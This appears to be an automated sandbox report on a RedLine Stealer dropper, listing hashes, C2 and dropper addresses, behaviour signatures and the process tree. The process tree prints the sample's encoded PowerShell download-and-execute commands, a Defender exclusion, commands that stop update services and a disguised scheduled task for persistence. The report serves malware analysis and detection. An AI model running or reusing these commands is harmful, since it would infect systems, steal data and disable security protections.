Analysis

  • max time kernel
    46s
  • max time network
    86s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/05/2023, 12:58

General

  • Target

    51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe

  • Size

    135KB

  • MD5

    ad8afc145a12c83233a26a2f1db86133

  • SHA1

    343ba0dcec0c8e06a2e8fe7fabad0331ae39ed3f

  • SHA256

    51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea

  • SHA512

    196d208eae999c15f3d85732ca92153f52f53190f8edbe47651654bbe4170bd7ae068a7325d990279e612203f8c612998ad0cf0bdde694ac45a061f18149da1b

  • SSDEEP

    3072:mgJXgANP8n7qkMrXlVdq0ZtYJ3Zg+1qBiHNl8aX+EN:DdHkMr1VY0ZtYj7Nl8aX++

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.23/file.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.23/r.png

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.23/o.png

Extracted

Family

redline

Botnet

[ PRO ]

C2

185.161.248.16:26885

Attributes
  • auth_value

    b4958da54d1cdd9d9b28330afda1cc3c

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe
    "C:\Users\Admin\AppData\Local\Temp\51acdf673cd5c98225ac9c3893c1569c7458513b4f00bbb39c5818e3133466ea.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:236
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4000
      • C:\Users\Admin\AppData\Roaming\OneDrive.exe
        "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
        3⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:4212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1348
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:3484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4616
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Checks processor information in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3964
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4240
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:3260
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3236
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
            PID:3292
            • C:\Windows\System32\sc.exe
              sc stop UsoSvc
              3⤵
              • Launches sc.exe
              PID:3892
            • C:\Windows\System32\sc.exe
              sc stop WaaSMedicSvc
              3⤵
              • Launches sc.exe
              PID:952
            • C:\Windows\System32\sc.exe
              sc stop wuauserv
              3⤵
              • Launches sc.exe
              PID:4952
            • C:\Windows\System32\sc.exe
              sc stop bits
              3⤵
              • Launches sc.exe
              PID:3332
            • C:\Windows\System32\sc.exe
              sc stop dosvc
              3⤵
              • Launches sc.exe
              PID:1196
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            2⤵
              PID:3424
              • C:\Windows\System32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                  PID:4324
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -hibernate-timeout-dc 0
                  3⤵
                    PID:4128
                  • C:\Windows\System32\powercfg.exe
                    powercfg /x -standby-timeout-ac 0
                    3⤵
                      PID:4976
                    • C:\Windows\System32\powercfg.exe
                      powercfg /x -standby-timeout-dc 0
                      3⤵
                        PID:5024
                    • C:\Windows\System32\dialer.exe
                      C:\Windows\System32\dialer.exe
                      2⤵
                        PID:1176
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#yramilr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }
                        2⤵
                          PID:4808

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                        Filesize

                        2KB

                        MD5

                        d85ba6ff808d9e5444a4b369f5bc2730

                        SHA1

                        31aa9d96590fff6981b315e0b391b575e4c0804a

                        SHA256

                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                        SHA512

                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        6f4cc7e6de6b3389079cebf4386f53b8

                        SHA1

                        8b6c009d98da297c3b78cdb9bc7190d4b511e684

                        SHA256

                        8e55c462848e00013de18e1ee248c2df9233e75f510a17090fc0e3fb22bfef91

                        SHA512

                        2eb126c745f90d0213cc227885b856ede0b33458d02c4313a89981db90c1b847d573a8109b3d46b17a808511716c2c006bbefa86b1ec5f2f710587db4477ad17

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        f1549cc7b079aafe5a84d4589e478849

                        SHA1

                        7b075f7b88d8a2c5d9cd27090a514d60de5bbd4d

                        SHA256

                        6adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5

                        SHA512

                        7ff46d7a36ebb1607f923d151e5ae3e17559bc18f5f621be0bbb16365ddcdb255794fe47cfb354cf0f58f6763bc628c1c98df7933f927e20d93dbc2c5519fc20

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        1KB

                        MD5

                        f1549cc7b079aafe5a84d4589e478849

                        SHA1

                        7b075f7b88d8a2c5d9cd27090a514d60de5bbd4d

                        SHA256

                        6adfd6fd5b210f2cbf2ca9f3a89a27c937fba828a9c00888c1c3f86c6c4b38d5

                        SHA512

                        7ff46d7a36ebb1607f923d151e5ae3e17559bc18f5f621be0bbb16365ddcdb255794fe47cfb354cf0f58f6763bc628c1c98df7933f927e20d93dbc2c5519fc20

                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Filesize

                        944B

                        MD5

                        c668035e150c1830e7eeeb21061e5956

                        SHA1

                        db098c3a81998ad385c69e2e62824522a12a7b56

                        SHA256

                        a5e00ecad3f9279c0780a177711280ba4068d5f0b19559d94267826f9a62792b

                        SHA512

                        248add6bfc6d7fd5fd279b99369c2f54d51ae7a6259582485915dc907172f1c514b125a6c3462b0db710336d31736fb6ce7cbf3672dd4c24db7578bf234832d5

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_grx3tgd5.d04.ps1

                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Roaming\OneDrive.exe

                        Filesize

                        8.7MB

                        MD5

                        9dc5d44e7055db45d497d1f57f7f2ca9

                        SHA1

                        943a84709d9f0c75ebcf9a7aedac98a31f38d133

                        SHA256

                        bfc80742ac9502fe2a0d3e4f540aef5b7805f0d323d7e1e6e35761904d5da232

                        SHA512

                        d436eb8bab8145cdf03129ef6a27f0ea1250d57be94bf2f9de8f0daa0ca80d7c6a4832213b3d56a1394b50cff67cb276018428178c454d8003874c1f82a8a84d

                      • C:\Users\Admin\AppData\Roaming\OneDrive.exe

                        Filesize

                        8.7MB

                        MD5

                        9dc5d44e7055db45d497d1f57f7f2ca9

                        SHA1

                        943a84709d9f0c75ebcf9a7aedac98a31f38d133

                        SHA256

                        bfc80742ac9502fe2a0d3e4f540aef5b7805f0d323d7e1e6e35761904d5da232

                        SHA512

                        d436eb8bab8145cdf03129ef6a27f0ea1250d57be94bf2f9de8f0daa0ca80d7c6a4832213b3d56a1394b50cff67cb276018428178c454d8003874c1f82a8a84d

                      • memory/236-133-0x0000000000820000-0x0000000000846000-memory.dmp

                        Filesize

                        152KB

                      • memory/392-266-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/392-262-0x0000020396020000-0x0000020396047000-memory.dmp

                        Filesize

                        156KB

                      • memory/392-282-0x0000020396020000-0x0000020396047000-memory.dmp

                        Filesize

                        156KB

                      • memory/396-270-0x0000023C01170000-0x0000023C01197000-memory.dmp

                        Filesize

                        156KB

                      • memory/396-272-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/396-284-0x0000023C01170000-0x0000023C01197000-memory.dmp

                        Filesize

                        156KB

                      • memory/632-279-0x000002CB63200000-0x000002CB63227000-memory.dmp

                        Filesize

                        156KB

                      • memory/632-281-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/632-286-0x000002CB63200000-0x000002CB63227000-memory.dmp

                        Filesize

                        156KB

                      • memory/636-252-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/636-251-0x0000020E37260000-0x0000020E37287000-memory.dmp

                        Filesize

                        156KB

                      • memory/636-276-0x0000020E37260000-0x0000020E37287000-memory.dmp

                        Filesize

                        156KB

                      • memory/636-249-0x0000020E36E70000-0x0000020E36E91000-memory.dmp

                        Filesize

                        132KB

                      • memory/692-278-0x000001EA80730000-0x000001EA80757000-memory.dmp

                        Filesize

                        156KB

                      • memory/692-253-0x000001EA80730000-0x000001EA80757000-memory.dmp

                        Filesize

                        156KB

                      • memory/692-257-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/968-280-0x00000187C97A0000-0x00000187C97C7000-memory.dmp

                        Filesize

                        156KB

                      • memory/968-261-0x00000187C97A0000-0x00000187C97C7000-memory.dmp

                        Filesize

                        156KB

                      • memory/968-265-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1032-321-0x0000016670340000-0x0000016670367000-memory.dmp

                        Filesize

                        156KB

                      • memory/1032-289-0x0000016670340000-0x0000016670367000-memory.dmp

                        Filesize

                        156KB

                      • memory/1032-291-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1124-292-0x000002B085BA0000-0x000002B085BC7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1124-294-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1124-322-0x000002B085BA0000-0x000002B085BC7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1132-323-0x0000023673F60000-0x0000023673F87000-memory.dmp

                        Filesize

                        156KB

                      • memory/1132-295-0x0000023673F60000-0x0000023673F87000-memory.dmp

                        Filesize

                        156KB

                      • memory/1132-297-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1140-302-0x0000021CC4390000-0x0000021CC43B7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1140-304-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1140-320-0x0000021CC4390000-0x0000021CC43B7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1176-234-0x00007FFDF8DC0000-0x00007FFDF8E7E000-memory.dmp

                        Filesize

                        760KB

                      • memory/1176-267-0x00007FF692AA0000-0x00007FF692AC9000-memory.dmp

                        Filesize

                        164KB

                      • memory/1176-233-0x00007FFDFAD70000-0x00007FFDFAF65000-memory.dmp

                        Filesize

                        2.0MB

                      • memory/1264-324-0x000002558F140000-0x000002558F167000-memory.dmp

                        Filesize

                        156KB

                      • memory/1264-309-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1264-307-0x000002558F140000-0x000002558F167000-memory.dmp

                        Filesize

                        156KB

                      • memory/1312-308-0x000002775FBC0000-0x000002775FBE7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1312-326-0x000002775FBC0000-0x000002775FBE7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1312-315-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1332-328-0x000001A7957C0000-0x000001A7957E7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1332-311-0x000001A7957C0000-0x000001A7957E7000-memory.dmp

                        Filesize

                        156KB

                      • memory/1332-317-0x00007FFDBADF0000-0x00007FFDBAE00000-memory.dmp

                        Filesize

                        64KB

                      • memory/1348-182-0x0000027FFF620000-0x0000027FFF630000-memory.dmp

                        Filesize

                        64KB

                      • memory/1348-180-0x0000027FFF620000-0x0000027FFF630000-memory.dmp

                        Filesize

                        64KB

                      • memory/1364-330-0x000001C797160000-0x000001C797187000-memory.dmp

                        Filesize

                        156KB

                      • memory/1380-379-0x000001A6EE0E0000-0x000001A6EE107000-memory.dmp

                        Filesize

                        156KB

                      • memory/3236-230-0x000001B1C1250000-0x000001B1C1260000-memory.dmp

                        Filesize

                        64KB

                      • memory/3236-229-0x000001B1C1250000-0x000001B1C1260000-memory.dmp

                        Filesize

                        64KB

                      • memory/3236-228-0x000001B1C1250000-0x000001B1C1260000-memory.dmp

                        Filesize

                        64KB

                      • memory/3484-254-0x000000000C880000-0x000000000CA42000-memory.dmp

                        Filesize

                        1.8MB

                      • memory/3484-200-0x0000000005890000-0x00000000058A0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3484-193-0x0000000000400000-0x0000000000430000-memory.dmp

                        Filesize

                        192KB

                      • memory/3484-271-0x0000000005890000-0x00000000058A0000-memory.dmp

                        Filesize

                        64KB

                      • memory/3484-264-0x000000000D790000-0x000000000DCBC000-memory.dmp

                        Filesize

                        5.2MB

                      • memory/3484-245-0x000000000C620000-0x000000000C670000-memory.dmp

                        Filesize

                        320KB

                      • memory/3484-199-0x000000000AD80000-0x000000000ADBC000-memory.dmp

                        Filesize

                        240KB

                      • memory/3484-198-0x000000000AD20000-0x000000000AD32000-memory.dmp

                        Filesize

                        72KB

                      • memory/3484-226-0x000000000BF10000-0x000000000C4B4000-memory.dmp

                        Filesize

                        5.6MB

                      • memory/3484-197-0x000000000AE30000-0x000000000AF3A000-memory.dmp

                        Filesize

                        1.0MB

                      • memory/3484-216-0x000000000B1B0000-0x000000000B242000-memory.dmp

                        Filesize

                        584KB

                      • memory/3484-215-0x000000000B090000-0x000000000B106000-memory.dmp

                        Filesize

                        472KB

                      • memory/3484-196-0x000000000B340000-0x000000000B958000-memory.dmp

                        Filesize

                        6.1MB

                      • memory/3964-188-0x0000000003360000-0x00000000033C6000-memory.dmp

                        Filesize

                        408KB

                      • memory/3964-189-0x00000000058C0000-0x000000000595C000-memory.dmp

                        Filesize

                        624KB

                      • memory/3964-214-0x0000000005CF0000-0x0000000005D00000-memory.dmp

                        Filesize

                        64KB

                      • memory/3964-192-0x0000000005CF0000-0x0000000005D00000-memory.dmp

                        Filesize

                        64KB

                      • memory/3964-190-0x0000000005820000-0x0000000005886000-memory.dmp

                        Filesize

                        408KB

                      • memory/3964-184-0x0000000000400000-0x000000000040C000-memory.dmp

                        Filesize

                        48KB

                      • memory/4000-201-0x00000216C7470000-0x00000216C7480000-memory.dmp

                        Filesize

                        64KB

                      • memory/4000-202-0x00000216C7470000-0x00000216C7480000-memory.dmp

                        Filesize

                        64KB

                      • memory/4000-139-0x00000216C7470000-0x00000216C7480000-memory.dmp

                        Filesize

                        64KB

                      • memory/4000-203-0x00000216C7470000-0x00000216C7480000-memory.dmp

                        Filesize

                        64KB

                      • memory/4000-138-0x00000216C7470000-0x00000216C7480000-memory.dmp

                        Filesize

                        64KB

                      • memory/4000-146-0x00000216C7410000-0x00000216C7432000-memory.dmp

                        Filesize

                        136KB

                      • memory/4000-181-0x00000216C7470000-0x00000216C7480000-memory.dmp

                        Filesize

                        64KB

                      • memory/4212-258-0x00007FF6793F0000-0x00007FF67A369000-memory.dmp

                        Filesize

                        15.5MB

                      • memory/4212-274-0x00007FF6793F0000-0x00007FF67A369000-memory.dmp

                        Filesize

                        15.5MB

                      • memory/4212-213-0x00007FF6793F0000-0x00007FF67A369000-memory.dmp

                        Filesize

                        15.5MB

                      • memory/4240-135-0x000001C14D400000-0x000001C14D410000-memory.dmp

                        Filesize

                        64KB

                      • memory/4240-136-0x000001C14D400000-0x000001C14D410000-memory.dmp

                        Filesize

                        64KB

                      • memory/4616-140-0x000001F661F90000-0x000001F661FA0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4616-137-0x000001F661F90000-0x000001F661FA0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4616-183-0x000001F661F90000-0x000001F661FA0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4808-248-0x000002352F1E0000-0x000002352F1F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4808-247-0x000002352F1E0000-0x000002352F1F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4808-246-0x000002352F1E0000-0x000002352F1F0000-memory.dmp

                        Filesize

                        64KB

                      • memory/4808-285-0x000002352F1E0000-0x000002352F1F0000-memory.dmp

                        Filesize

                        64KB